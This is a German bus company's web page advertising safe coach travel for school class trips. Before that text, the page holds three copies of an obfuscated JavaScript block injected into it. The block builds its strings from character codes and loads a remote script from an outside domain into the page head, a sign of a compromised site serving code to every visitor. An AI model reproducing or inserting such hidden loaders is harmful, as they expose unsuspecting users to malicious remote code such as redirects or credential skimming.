Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Klassenfahrten

“Kein vernünftiger Erwachsener spart an der Sicherheit seines Kindes, das wäre dumm und verantwortungslos.”

 

Auch Jugendliche und Schulklassen sind bei uns sehr willkommene Gäste. Bei uns werden Sie in komfortablen Hotels der guten Mittelklasse untergebracht und auch in unseren komfortablen und sicheren Reisebussen gefahren, so dass Sie keine Angst haben müssen, Ihr Kind wegfahren zu lassen.

 

Nicht der billigste Preis sollte entscheidend sein, sondern die Sicherheit Ihrer Schüler und Kinder sollte an erster Stelle stehen.

 

Qualität muss nicht immer teurer sein, aber den Preis wert.

 

Mit den sichersten Reisebussen, die es auf den Straßen gibt, von Mercedes-Benz sowie erstklassigen und motivierten Fahrern wird Ihr Schulausflug garantiert ein voller Erfolg.

 

 

Sehr geehrte Pädagogen und Eltern,

 

der Reisebus bringt Abwechslung in den schulischen Alltag. Ob für Tagesausflüge in nahe gelegene Museen, längere Reisen in das Schullandheim oder Abschlussfahrten ins Ausland: Für jeden Zweck finden Sie das passende Fahrzeug. Busse sind flexibel einsetzbar und eignen sich deshalb besonders gut zur Umsetzung schulischer Ausflugsprogramme, ohne die Klassenkasse und den Geldbeutel der Eltern allzu stark zu belasten.

 

Verantwortungsbewusste Lehrer achten aber nicht nur auf den Preis. Sicherheit hat im Umgang mit jungen Menschen oberste Priorität. Schließlich wollen Sie den hohen Erwartungen der Gesellschaft in pädagogischen Einrichtungen gerecht werden und das Vertrauen, das Ihnen von den Erziehungsberechtigten entgegen gebracht wird, nicht enttäuschen. Und komfortable Busse sorgen dafür, dass sich junge Menschen nachhaltig für das umweltfreundlichste Verkehrsmittel begeistern.

 

Doch gute Schulausflüge müssen auch gut vorbereitet sein. Dabei stellen sich eine ganze Reihe von Fragen: Mit welchen Ausflugszielen lassen sich aufregende Erlebnisse und die Vermittlung von Wissen sinnvoll miteinander verbinden? Wie soll das Programm gestaltet werden, damit auch die soziale Kompetenz der Schüler gestärkt wird? Wie findet man einen guten und günstigen Reiseveranstalter? Worauf ist beim Buchen einer Busreise zu achten?

 

Die Antworten auf diese und viele weitere wichtige Fragen sind unter www.klassefaehrtklasse.de zu finden. Mit dieser Homepage bietet die Gütegemeinschaft Buskomfort (gbk) den Schulen einen nützlichen Service an. Per Mausklick finden Lehrer, Eltern und Schüler gute Tipps von Experten sowie Links zu Destinationen und Freizeitparks. Das breite Spektrum der Themen reicht von allgemeinen Infos zur Bustouristik über Antworten auf versicherungstechnische Fragen bis zu Reportagen über spannende Klassenfahrten.
Gerne schicken wir Ihnen weiterführendes Informationsmaterial über qualitativ hochwertige Busreisen und unterbreiten ein individuelles Angebot. Über Ihren Anruf hierüber freuen wir uns! Weitere Informationen erhalten Sie auch im Internet unter www.klassefaehrtklasse.de.

 

 

Für Ihre anspruchsvolle Arbeit wünschen wir Ihnen viel Erfolg und Ihren Schülern viele schöne Erlebnisse im Bus!

Hier kommen Sie zum Mietbusanfrage-Formular für Ihr persönliches Angebot.